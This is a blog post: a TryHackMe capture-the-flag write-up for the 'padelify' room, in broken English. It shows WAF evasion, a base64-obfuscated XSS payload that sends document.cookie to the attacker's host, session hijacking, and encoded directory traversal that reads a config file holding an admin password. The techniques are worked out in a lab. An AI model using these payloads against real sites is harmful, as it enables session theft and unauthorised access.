<!DOCTYPE html>
<html lang="ro-ro"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">padelify | Cyber Blog-ul lui Novac</title>
<meta property="og:title" content="padelify | Cyber Blog-ul lui Novac" />
<meta name="twitter:title" content="padelify | Cyber Blog-ul lui Novac" />
<meta itemprop="name" content="padelify | Cyber Blog-ul lui Novac" />
<meta name="application-name" content="padelify | Cyber Blog-ul lui Novac" />
<meta property="og:site_name" content="" />

<meta name="description" content="">
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />

<meta property="og:locale" content="ro-ro" />
<meta name="language" content="ro-ro" />

  <link rel="alternate" hreflang="en" href="https://novaclearnscyber.github.io/blog/posts/padelify/" title="" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2026-01-17T21:40:05Z />
    <meta property="article:published_time" content=2026-01-17T21:40:05Z />
    <meta property="og:url" content="https://novaclearnscyber.github.io/blog/posts/padelify/" />

    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "padelify",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2026-01-17",
        "description": "",
        "wordCount":  479 ,
        "mainEntityOfPage": "True",
        "dateModified": "2026-01-17",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "Cyber Blog-ul lui Novac"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.152.2">

    
    <meta property="og:url" content="https://novaclearnscyber.github.io/blog/posts/padelify/">
  <meta property="og:site_name" content="Cyber Blog-ul lui Novac">
  <meta property="og:title" content="padelify">
  <meta property="og:description" content="reconing First thinks first , its time to look for information
I tried running a gobuster scan with a common wordlists for discovery but nothing returned , surely a WAF( web aplication firewall )is blocking the acces
lets try to bypass it , using the flag -a bypass it pretty simple
for noobies (like me ) the -a flag uses a diferent user agent than the default gobuster agent ,
a user agent is a string of character that make the request to the site">
  <meta property="og:locale" content="ro_ro">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:modified_time" content="2026-01-17T21:40:05+00:00">
    <meta property="article:tag" content="Note">
    <meta property="article:tag" content="Journal">
    <meta property="article:tag" content="CyberStuff">


    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="padelify">
  <meta name="twitter:description" content="reconing First thinks first , its time to look for information
I tried running a gobuster scan with a common wordlists for discovery but nothing returned , surely a WAF( web aplication firewall )is blocking the acces
lets try to bypass it , using the flag -a bypass it pretty simple
for noobies (like me ) the -a flag uses a diferent user agent than the default gobuster agent ,
a user agent is a string of character that make the request to the site">


    

    <link rel="canonical" href="https://novaclearnscyber.github.io/blog/posts/padelify/">
    <link href="https://novaclearnscyber.github.io/blog/style.min.e390ba7da26222f4dc42a349955d76dbbe44e5ce2535a43de5a70633a0a9ec3c.css" rel="stylesheet">
    <link href="https://novaclearnscyber.github.io/blog/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="https://novaclearnscyber.github.io/blog/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://novaclearnscyber.github.io/blog/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://novaclearnscyber.github.io/blog/icons/favicon-16x16.png">
    <link rel="mask-icon" href="https://novaclearnscyber.github.io/blog/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="https://novaclearnscyber.github.io/blog/favicon.ico">




<link rel="manifest" href="https://novaclearnscyber.github.io/blog/site.webmanifest">

<meta name="msapplication-config" content="/blog/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">
    <meta name="color-scheme" content="light dark">

    
    <link rel="icon" type="image/svg+xml" href="https://novaclearnscyber.github.io/blog/icons/favicon.svg">

    
    
    
</head>
<body data-theme = "" class="notransition">

<script src="https://novaclearnscyber.github.io/blog/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://novaclearnscyber.github.io/blog/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title></title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">padelify</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2026-01-17T21:40:05&#43;00:00" itemprop="datePublished"> Jan 17, 2026 </time>
                </div>
                
            </header>
            
            <div class="page-content">
                <h3 id="reconing">reconing</h3>
<p>First thinks first , its time to look for information</p>
<p>I tried running a gobuster scan with a common wordlists for discovery but nothing returned , surely a WAF( web aplication firewall )is blocking the acces<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117111458.png" alt=""></p>
<p>lets try to bypass it , using the flag <code>-a</code> bypass it pretty simple<br>
for noobies (like me ) the -a flag uses a diferent user agent than the default gobuster agent ,<br>
a user agent is a string of character that make the request to the site</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117112836.png" alt=""><br>
i gonna try another list this one is to short i think</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117113229.png" alt=""><br>
better this way , firefart is such a goated name<br>
lets try to accces config</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117113720.png" alt=""><br>
and the WAF is blocking it again cool</p>
<p>lets try to acces the log file<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117113943.png" alt=""><br>
ok cool it works<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117114001.png" alt=""><br>
and we have this cool error message here that explain us that xss (cross site scripting) attems may be possible , and also that the HttpOnly flag is not set</p>
<h3 id="how-we-gonna-try-to-break-it">how we gonna try to break it</h3>
<p>A WAF can be passed a few ways , one of them is using a 64bit encoded string and the functions :<br>
<code>atiob()</code>- used to decode base 64  and <code>eval()</code> for executing the code resulted</p>
<p>so lets starts</p>
<p>first of all lets start a server to catch the flag with  <code>python3 -m http.server 80</code></p>
<p>the we gonna go to the main sing up page and enter in the username place the followring:</p>
<pre tabindex="0"><code>&lt;body` 
`onload=&#34;eval(atob(&#39;ZmV0Y2goJ2h0dHA6Ly8xOTIuMTY4LjE0NS40LycrZG9jdW1lbnQuY29va2llKQ==&#39;))&#34;&gt;
</code></pre><p>the edcoded part is :</p>
<pre tabindex="0"><code>fetch(&#39;http://&lt;YOUR IP&gt;/&#39;+document.cookie)
</code></pre><p>this will go straight to the app and be execute<br>
in the password field just enter something random</p>
<p>and bam bam bam we got something<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117121034.png" alt=""></p>
<p>now we just change our cookie with that string :<br>
&lsquo;/PHPSESSID=pgulj9vf9eckvcpetht9ma6cmf&rsquo;</p>
<p>now we just go and change the cookie (press F12 and go to the storage section than cookies)</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117124301.png" alt=""></p>
<p>and we have the first flag :<br>
<strong>Flag:</strong> THM{Logged_1n_Moderat0r}</p>
<h3 id="second-flag">Second Flag</h3>
<pre tabindex="0"><code>note : if u see a different ip is because i had to restart the challenege 
</code></pre><p>i click on Live button in the right upper corner of the previos panel and i got the following<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117162139.png" alt=""><br>
and if we look at the URL we may something interesting , the page=match.php , lets try to exploitat in a directory traversal way<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117162216.png" alt=""><br>
and the waf is blocking us again ,<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117162422.png" alt=""></p>
<p>lets maybe try to encode the character &ldquo;/&rdquo;</p>
<p>i encoded <code>/</code> with the character ..%2F which is URL encoding</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117162541.png" alt=""><br>
this is something interesting</p>
<p>lets try to read the config file with this vulnerability<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117163601.png" alt=""><br>
note: dont forget to encode &lsquo;.&rsquo; to  %2E or else will not work<br>
cool very cool we get it<br>
we may see some information in the app.conf about the admin info<br>
<code>admin_info = &quot;bL}8,S9W1o44&quot;</code><br>
lets try to log in with this</p>
<p>and with the username ; admin and the password from above we succed to log in<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260117163937.png" alt=""><br>
<strong>Flag:</strong> THM{Logged_1n_Adm1n001}<br>
very cool chalange thank u THM</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
</div>
    <small class="footer_copyright">
        © 2026 .
        
    </small>
</footer>







    
    <script src="https://novaclearnscyber.github.io/blog/js/main.min.4ee188e1744c19816e95a540b2650ed9f033ea0371e74eac8e717355cfca8741.js" integrity="sha256-TuGI4XRMGYFulaVAsmUO2fAz6gNx506sjnFzVc/Kh0E="></script>

    

</body>
</html>
